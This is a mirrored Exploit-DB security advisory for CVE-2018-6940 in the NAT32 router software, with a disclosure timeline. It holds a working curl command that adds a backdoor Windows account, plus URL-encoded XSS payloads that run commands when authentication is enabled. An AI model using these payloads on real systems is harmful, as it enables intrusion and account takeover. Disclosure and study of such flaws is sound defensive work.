NAT32 2.2 Build 22284 – Remote Command Execution

• Exploit Database
• 118 阅读

• 作者： hyp3rlinx
  日期： 2018-02-14
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44033/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143

  [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source:http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt [+] ISR: Apparition Security   [-_-] D1rty0tis   Vendor: ============= www.nat32.com     Product: ================= NAT32 Build (22284)     NAT32 is a versatile IP Router implemented as a WIN32 application.     Vulnerability Type: =================== Remote Command Execution     CVE Reference: ============== CVE-2018-6940     Security Issue: ================ NAT32 listens on Port 8080 for its Web interface.   C:\>netstat -ano | findstr 8080 TCP0.0.0.0:8080 0.0.0.0:0LISTENING 3720     If the &apos;Password Checking&apos; (BASIC authentication) feature is NOT enabled (user must select it under config tab) then remote attackers who can reach NAT32 can potentially execute arbitrary commands, if authentication is enabled they will get &apos;Unauthorized&apos; server reply, however, read on ...   e.g.   Add user account.   C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add" <!DOCTYPE html> <html> <body><pre>run start net user D1rty0Tis abc123 /add Done </pre></body></html>     If NAT32 &apos;Password Checking&apos; feature IS enabled, remote attackers can STILL potentially issue arbitrary commands exploiting a Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated NAT32 users click a malicious link or visit an attacker controlled webpage.   Also worth mentioning, NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily revealed if sniffed on network.   When &apos;Password Checking&apos; is enabled attackers using Ajax calls via XSS would need to use a combination of &apos;%0D%0A&apos; and double encoding to deal with &apos;white-space&apos; in order for the payload to stay intact.   %25 for &apos;%&apos; sign then 20 (%2520) = %20, using %20 or %2B will not cut it, however &apos;%0D%0A&apos; (CRLF) and &apos;%2520&apos; encoding serves us well.     NAT32 has an interesting Command &apos;EXECR&apos; that can allow attackers to capture Command output response from the server to see right away if an attack was success or not.   e.g.   Add account and get response (EXECR)   HTTP Response: <!DOCTYPE html> <html> <body><pre>The command completed successfully.   execr net user D1rty0Tis abc123 /add Done </pre></body></html>     The NAT32 &apos;winroute&apos; Command will return host route information.   XSS response   e.g.   <!DOCTYPE html> <html> <body><pre>DestinationMaskNexthopMetric IfIndex Type Proto Age 0.0.0.0 0.0.0.0 192.168.1.210 b4 3 21:41 [min:sec] 127.0.0.0 255.0.0.0 127.0.0.130613 3 22:04 [min:sec] 127.0.0.1 255.255.255.255 127.0.0.130613 3 22:04 [min:sec] 127.255.255.255 255.255.255.255 127.0.0.130613 3 22:04 [min:sec] </pre></body></html>     Exploit/POC: ============= NET32 Password Checking not enabled...   C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add"     NAT32 BASIC authentication enabled use XSS...   Add backdoor account and capture CMD output using NAT32 &apos;execr&apos; shell command. http://x.x.x.x:8080/shell?cmd=<script>var%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(&apos;GET&apos;,&apos;http://x.x.x.x:8080/shell?cmd=execr%2520net%2520user%2520D1rty0Tis%2520abc123%2520/add&apos;,true);xhr.send(null);</script>   Get Windows Routes (info disclosure): http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E       Network Access: =============== Remote     Severity: ========= High     Disclosure Timeline: ============================= Vendor Notification: February 9, 2018 Vendor acknowledgement: February 9, 2018 Vendor "I&apos;ve decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018 www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018 February 14, 2018 : Public Disclosure       [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).